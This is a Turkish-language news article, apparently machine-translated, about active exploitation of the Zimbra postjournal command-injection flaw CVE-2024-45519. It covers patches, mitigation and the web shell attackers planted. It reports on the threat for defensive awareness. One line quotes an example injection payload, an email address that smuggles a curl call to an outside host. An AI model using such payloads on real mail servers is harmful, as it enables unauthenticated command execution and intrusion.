Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Yazı Tipi BoyutlandırıcıAa
  • Anasayfa
  • Teknoloji
    • Siber Güvenlik
    • Yapay Zeka
    • Donanım
    • Bilim
  • Yazılım
  • Savunma & İstihbarat
  • Oyun
  • Yaşam
    • Finans
    • Sinema
    • Dünyadan Haberler
  • İş Birliği
Okuma: Araştırmacılar, Zimbra’nın Günlük Sonrası Kritik Kusurundan Yararlanan Aktif Saldırılara Karşı Alarm Veriyor
Paylaş
Yazı Tipi BoyutlandırıcıAa
Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Ara
Bizi Takip Et
  • Hakkımızda
  • Gizlilik politikası
  • Tanıtım Yazısı ve Backlink Hizmeti
© 2026 Teknomers. All Rights Reserved.

Anasayfa » Araştırmacılar, Zimbra’nın Günlük Sonrası Kritik Kusurundan Yararlanan Aktif Saldırılara Karşı Alarm Veriyor

GenelSiber Güvenlik

Araştırmacılar, Zimbra’nın Günlük Sonrası Kritik Kusurundan Yararlanan Aktif Saldırılara Karşı Alarm Veriyor

teknomers
Son güncelleme: 2 Ekim 2024 11:31
teknomers
Paylaş
Paylaş


02 Eki 2024Hacker HaberleriE-posta Güvenliği / Güvenlik Açığı

Siber güvenlik araştırmacıları, Synacor’un Zimbra İşbirliğinde yeni ortaya çıkan bir güvenlik açığını hedef alan aktif istismar girişimleri konusunda uyarıda bulunuyor.

Kurumsal güvenlik firması Proofpoint, etkinliği 28 Eylül 2024’ten itibaren gözlemlemeye başladığını söyledi. CVE-2024-45519Zimbra’nın günlük sonrası hizmetinde, kimliği doğrulanmamış saldırganların etkilenen kurulumlarda rastgele komutlar yürütmesine olanak tanıyan ciddi bir güvenlik açığı.

Proofpoint, “Gmail’i taklit eden e-postalar, Zimbra sunucularının bunları ayrıştırıp komut olarak yürütmesi amacıyla CC alanlarındaki sahte adreslere gönderildi.” söz konusu X’teki bir dizi gönderide. “Adresler, sh yardımcı programıyla yürütülen Base64 dizelerini içeriyordu.”

Kritik sorun Zimbra tarafından ele alındı. 8.8.15 Yama 46, 9.0.0 Yama 41, 10.0.9 ve 10.1.1 sürümleri 4 Eylül 2024’te yayınlandı. Lebr0nli (Alan Li) adlı bir güvenlik araştırmacısının, eksikliği keşfetmesi ve raporlamasıyla itibar kazandı.

Synacor’da güvenlik mimarı mühendisi olan Ashish Kataria, “Günlük sonrası özelliği çoğu sistemde isteğe bağlı olsa da veya etkinleştirilmese de, olası istismarı önlemek için sağlanan yamayı uygulamak hala gereklidir.” not edildi 19 Eylül 2024 tarihli bir yorumda.

“Günlük sonrası özelliğinin etkinleştirilmediği ve yamanın hemen uygulanamadığı Zimbra sistemleri için, günlük sonrası ikili dosyasının kaldırılması, yama uygulanana kadar geçici bir önlem olarak düşünülebilir.”

Zimbra Günlük Sonrası Kusur

Proofpoint, kodu çözüldüğünde savunmasız bir Zimbra sunucusuna şu konumdaki bir web kabuğu yazmaya çalışan bir dizi CC’d adresi tanımladığını söyledi: “/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp.”

Yüklenen web kabuğu daha sonra önceden belirlenmiş bir JSESSIONID Çerez alanıyla gelen bağlantıyı dinler ve varsa, Base64 komutları için JACTION çerezini ayrıştırmaya devam eder.

Web kabuğu, exec aracılığıyla komut yürütme desteğiyle donatılmıştır. Alternatif olarak, bir dosyayı soket bağlantısı üzerinden indirip çalıştırabilir. Bu yazının yazıldığı tarih itibarıyla saldırılar bilinen bir tehdit aktörüne veya grubuna atfedilmemiştir.

Bununla birlikte, yararlanma faaliyeti, Project Discovery’nin kusurun teknik ayrıntılarını yayınlamasından bir gün sonra başlamış gibi görünüyor. söz konusu bu “temizlenmemiş kullanıcı girişinin aktarılmasından kaynaklanıyor açık yamasız sürümde saldırganların keyfi komutlar vermesine olanak tanıyor.”

Siber güvenlik şirketi, sorunun kökeninin, C tabanlı günlük sonrası ikili programın alıcı e-posta adreslerini “msg_handler()” adı verilen bir işlevde işlemesi ve ayrıştırması, böylece özel hazırlanmış bir SMTP’yi geçirirken 10027 numaralı bağlantı noktasında çalışan hizmete komut enjeksiyonuna izin verme şeklinden kaynaklandığını söyledi. sahte adres içeren mesaj (örneğin, “aabbb$(curl${IFS}oast.me)”@mail.domain.com).

Aktif istismar girişimleri ışığında, potansiyel tehditlere karşı optimum koruma sağlamak için kullanıcıların en son yamaları uygulamaları şiddetle tavsiye edilir.



siber-2

Elektrikli araçların üretimi Cadillac Lyriq önümüzdeki hafta başlayacak
Spin Me Round incelemesi: unutulabilir bir tatil komedisi
Microsoft 365 güncellemesi, Office uygulamalarınızı tamamen farklı bir şekilde kullanmanızı sağlayabilir
46GB VRAM’li Nvidia RTX 4090 Ti GPU, kartlarda olabilir
Intel Raptor Lake amiral gemisi CPU, Core i9-12900K’yı havaya uçurabilir
ETİKETLENDİ:ağ güvenliğiAktifAlarmAraştırmacılarbilgi Güvenliğibilgisayar Güvenliğifidye yazılımı kötü amaçlı yazılımgünlükhack haberlerihacker haberleriKarşıKritikkusurundannasıl hacklenirsaldırılarasiber güncellemelersiber güvenlik güncellemelerisiber güvenlik haberleriSiber güvenlik haberleri bugünSiber Haberlersiber saldırılarsonrasıveri ihlaliVeriyoryararlananyazılım güvenlik açığıZimbranın
Bu Makaleyi Paylaş
Facebook Bağlantıyı Kopyala Yazdır
Paylaş
Önceki Makale Bu Garmin Vivoactive 5 fırsatı hala Amazon’da mevcut
Sonraki Makale ‘Guguk Kuşu’ Ekrana Sarsıcı Bir Uçuş Yaptı

Sanal Medya

FacebookBeğen
452Takip Et
PinterestSabitle
237Takip Et

Son Eklenenler

Rockstar Çalışanları GTA VI Öncesi Sendikalaşma İçin Hareketleniyor
Liste
Tesla Pedalsız ve Direksiyonsuz Cybercab’ı Austin’de Test Ediyor
Genel
Riverside, podcasting platformuyla bülten yayıncılığına adım attı
Yapay Zeka
Microsoft’un Surface Go ve Surface Laptop Go bütçe seçeneklerini kaldıracak
Donanım
Discord’da GIF Kayıpları Olmayacak, Tenor API Kapanıyor
Oyun
Kritik: Sahte Google Notlar Eklentisi ile Cüzdan Adreslerini Değiştiriyor
Siber Güvenlik
//

Siber güvenlik, yapay zeka ve savunma sanayiinden; finans ve sinema dünyasına uzanan geniş bir yelpaze. Teknomers; teknoloji, strateji ve yazılım dünyasını sade bir dille sizlerle buluşturuyor.

Kurumsal

  • Hakkımızda
  • Gizlilik politikası
  • Tanıtım Yazısı ve Backlink Hizmeti

Kategoriler

  • Teknoloji
  • Oyun
  • Sinema
  • Siber Güvenlik
  • Bilim
  • Finans
  • Dünyadan Güncel Haberler

Populer

  • TV'de Ücretsiz İzlenebilen Şifresiz Erotik Kanallar (2025 Güncel Frekans Listesi)

  • The Last of Us PC Kontrolleri: Hızlı Silah Değiştirme ve Tüm Tuşlar (2025)

  • Hogwarts Legacy'de Odaklanma İksiri Nasıl Yapılır?

Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Bizi Takip Et
© 2026 Teknomers. All Rights Reserved.
Welcome Back!

Sign in to your account

Kullanıcı Adı veya E-posta Adresi
Şifre

Şifrenizi mi unuttunuz?